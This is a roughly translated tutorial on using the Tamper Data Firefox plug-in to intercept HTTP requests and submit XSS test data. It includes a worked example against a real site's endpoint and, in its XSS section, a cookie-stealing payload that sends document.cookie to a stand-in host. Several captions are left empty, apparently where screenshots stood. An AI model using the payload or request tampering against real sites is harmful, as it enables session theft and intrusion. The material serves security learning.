Use Tamper Data to submit XSS attack Data

Use Tamper Data to submit XSS attack Data 1. Introduction

As a Firefox plug-in, Tamper Data is easy to use and powerful. It can be used to view and modify HTTP/HTTPS headers and POST parameters and model web attacks; tracking HTTP requests and responses and recording time;

Ii. Use

Tamper provides request monitoring and modification functions

2.1 request listening

The tool page is divided:

Monitoring window:

All HTTP requests sent from the web page opened by firefox tabs and their corresponding responses will be monitored by Tamper Data (default status)

The window in the lower left corner shows the header information of each request. Similar to Firebug.

The window in the lower-right corner shows the returned header information for each request, similar to Firebug. The details returned by the request are displayed by right-clicking the http request-view source.

Note: The Filter can only display requests for the specified domain name.

2.2 Request Interception

After you click Start Tempar, the window will pop up:

Click Tamper:

Right-click a request and add a new request parameter and request header, right-click the parameter name, and a menu is displayed, including the xss/SQL/data Option and xss has a pre-defined xss script. Or directly modify the value corresponding to the parameter. Click OK to submit the request.

XSS attack example

For interface, Custom Skin: http://t.163.com/user.do? Action = updateUserConfig for illegal data submission (xss)

Start Tamper and click Save on the page.

Pop-up window:

"Tamper" Operation:

To:

After submission:

The server returns 555. Illegal data submission is prohibited in the background.

Principle:

Iii. Tamper Option

Image Blocking is not supported by default. You can enable it in Option. You can also add custom data to the Context Menu.

 

 

Iv. Introduction to XSS

Discussion on the Application of reflective XSS in http://www.bkjia.com/Article/201006/51228.html

Http://www.bkjia.com/Article/200811/30675.html XSS attack based on CSRF

Http://www.bkjia.com/Article/200810/30105.html Anehta -- Boomerang (rollback), how to turn reflected XSS into persistent XSS: on cross-origin get cookie

Http://www.bkjia.com/kf/200611/15445.html XSS attack Cookie spoofing hiding JavaScript Execution

Http://t.163.com/nathanliu! Javascript: alert (document. cookie); If the url contains such a script: document. location = 'HTTP: // URL.com/cookie.php? Cookie = '+ escape (document. cookie)

4 --- Cross-Site Scripting (XSS) CSRF http://www.bkjia.com/Article/201212/178487.html [WebGoat notes]

XSS attack http://baike.baidu.com/view/2161269.htm

Common xss attack symbols:

[1] <> (angle brackets)

[2] "(quotation marks)

[3] '(single quotes)

[4] % (percent sign)

[5]; (semicolon)

[6] () (parentheses)

[7] & (& Symbol)

[8] + (plus sign)